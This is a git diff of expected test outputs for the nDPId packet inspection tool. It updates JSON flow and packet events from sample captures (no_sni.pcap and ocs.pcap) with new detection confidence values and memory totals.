+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1604822447287,"flow_last_seen":1604822447869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7366,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 
+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447844,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":268,"flow_first_seen":1604822444486,"flow_last_seen":1604822448523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":17062,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":785,"flow_first_seen":1604822444913,"flow_last_seen":1604822448604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":480607,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447227,"flow_last_seen":1604822447785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447249,"flow_last_seen":1604822447807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":268,"flow_first_seen":1604822444486,"flow_last_seen":1604822448523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":17062,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":785,"flow_first_seen":1604822444913,"flow_last_seen":1604822448604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":480607,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447227,"flow_last_seen":1604822447785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447249,"flow_last_seen":1604822447807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","packets-captured":1185,"packets-processed":1185,"total-skipped-flows":0,"total-l4-payload-len":523130,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1604822448604} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1185/1185 @@ -64,9 +64,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5930148 bytes -~~ total memory freed........: 5930148 bytes -~~ total allocations/frees...: 119353/119353 +~~ total memory allocated....: 6063782 bytes +~~ total memory freed........: 6063782 bytes +~~ total allocations/frees...: 122115/122115 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 988 chars 
diff --git a/test/results/ocs.pcap.out b/test/results/ocs.pcap.out
index f047c7273..97c20ba66 100644
--- a/test/results/ocs.pcap.out
+++ b/test/results/ocs.pcap.out
@@ -4,13 +4,13 @@ 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1449652784341,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652784341,"pkt":"RQAAPKbzQABABiV4wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIdPYAAAIEBbQEAggKADWBtgAAAAABAwMG"} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652786071,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1449652786071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":63,"pkt_l4_len":43,"thread_ts_msec":1449652786071,"pkt":"RQAAP4JiQABAETORwKi0AggICAiWSAA1ACtxaqbPAQAAAQAAAAAAAAVvY3UwMwhsYWJnZW5jeQJ3cwAAAQAB"} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652786071,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocu03.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652786071,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocu03.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652786098,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1449652786098,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":70,"pkt_l4_len":50,"thread_ts_msec":1449652786098,"pkt":"RQAARoJmQABAETOGwKi0AggICAicoQA1ADK8OQlbAQAAAQAAAAAAAAhzZXR0aW5ncwtjcmFzaGx5dGljcwNjb20AAAEAAQ=="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652786098,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"dns": {"query":"settings.crashlytics.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652786098,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"dns": {"query":"settings.crashlytics.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652786130,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1449652786130,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":67,"pkt_l4_len":47,"thread_ts_msec":1449652786130,"pkt":"RQAAQ4JpQABAETOGwKi0AggICAgFCwA1AC+TFZykAQAAAQAAAAAAAANhcGkEZXUwMQhjYXBwdGFpbgNjb20AAAEAAQ=="} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652786130,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"api.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652786130,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"api.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786135,"flow_last_seen":1449652786135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786135,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1449652786135,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786135,"pkt":"RQAAPJwfQABABqbCwKi0ArL40Da8egBQwI4edgAAAACgAjkI+LAAAAIEBbQEAggKADWCaQAAAAABAwMG"} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786152,"flow_last_seen":1449652786152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786152,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
@@ -19,93 +19,91 @@ 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1449652786167,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786167,"pkt":"RQAAPOubQABABs8fwKi0AomHgc7QbABQfGRp9gAAAACgAjkIVT4AAAIEBbQEAggKADWCbQAAAAABAwMG"} 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1449652786190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786190,"pkt":"RQAANJwgQABABqbJwKi0ArL40Da8egBQwI4ed\/tL3mKAEADlQqoAAAEBCAoANYJvRwX8Kg=="} 01476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1449652786215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":824,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":824,"pkt_l4_len":804,"thread_ts_msec":1449652786215,"pkt":"RQADOJwhQABABqPEwKi0ArL40Da8egBQwI4ed\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\/Pgo8bGd5cmVxdWVzdCBtb2R1bGU9IkNNL1ZPRCI+Cgk8YWN0aW9uIG5hbWU9ImluaXQiPgoJCTxwYXJhbSBuYW1lPSJzY3JlZW5TaXplIiB2YWx1ZT0iIi8+CgkJPHBhcmFtIG5hbWU9InRpbWVzdGFtcCIgdmFsdWU9IjAiLz4KCQk8cGFyYW0gbmFtZT0iYXBwLXZlcnNpb24iIHZhbHVlPSIxLjQuNyIvPgoJPC9hY3Rpb24+CjwvbGd5cmVxdWVzdD4="} 
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786135,"flow_last_seen":1449652786215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1449652786215,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; U; Android 4.0.4; fr-fr; GT-P7510 Build\/IMM76D) AppleWebKit\/534.30 (KHTML, like Gecko) Version\/4.0 Safari\/534.30"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786135,"flow_last_seen":1449652786215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1449652786215,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; U; Android 4.0.4; fr-fr; GT-P7510 Build\/IMM76D) AppleWebKit\/534.30 (KHTML, like Gecko) Version\/4.0 Safari\/534.30"}} 
00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1449652786268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786268,"pkt":"RQAANOucQABABs8mwKi0AomHgc7QbABQfGRp97oFwGaAEADlOEAAAAEBCAoANYJ3vXlL7A=="} 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1449652786271,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":211,"pkt_l4_len":191,"thread_ts_msec":1449652786271,"pkt":"RQAA0+udQABABs6GwKi0AomHgc7QbABQfGRp97oFwGaAGADl3TMAAAEBCAoANYJ3vXlL7EdFVCAveG1wcC1kaXNjbz9kZXZpY2VpZD1mMmM5OTNkNjIxOGY1ZTIyZmUyODRiMmU5MGM4MmYzYiZwdXNoX29uX2RldmljZT10cnVlJmFwcGlkPW9jczAwMDAwMyBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786167,"flow_last_seen":1449652786271,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1449652786271,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/xmpp-disco?deviceid=f2c993d6218f5e22fe284b2e90c82f3b&push_on_device=true&appid=ocs000003","code":0,"content_type":"","user_agent":""}} 
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786167,"flow_last_seen":1449652786271,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1449652786271,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/xmpp-disco?deviceid=f2c993d6218f5e22fe284b2e90c82f3b&push_on_device=true&appid=ocs000003","code":0,"content_type":"","user_agent":""}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786395,"flow_last_seen":1449652786395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786395,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 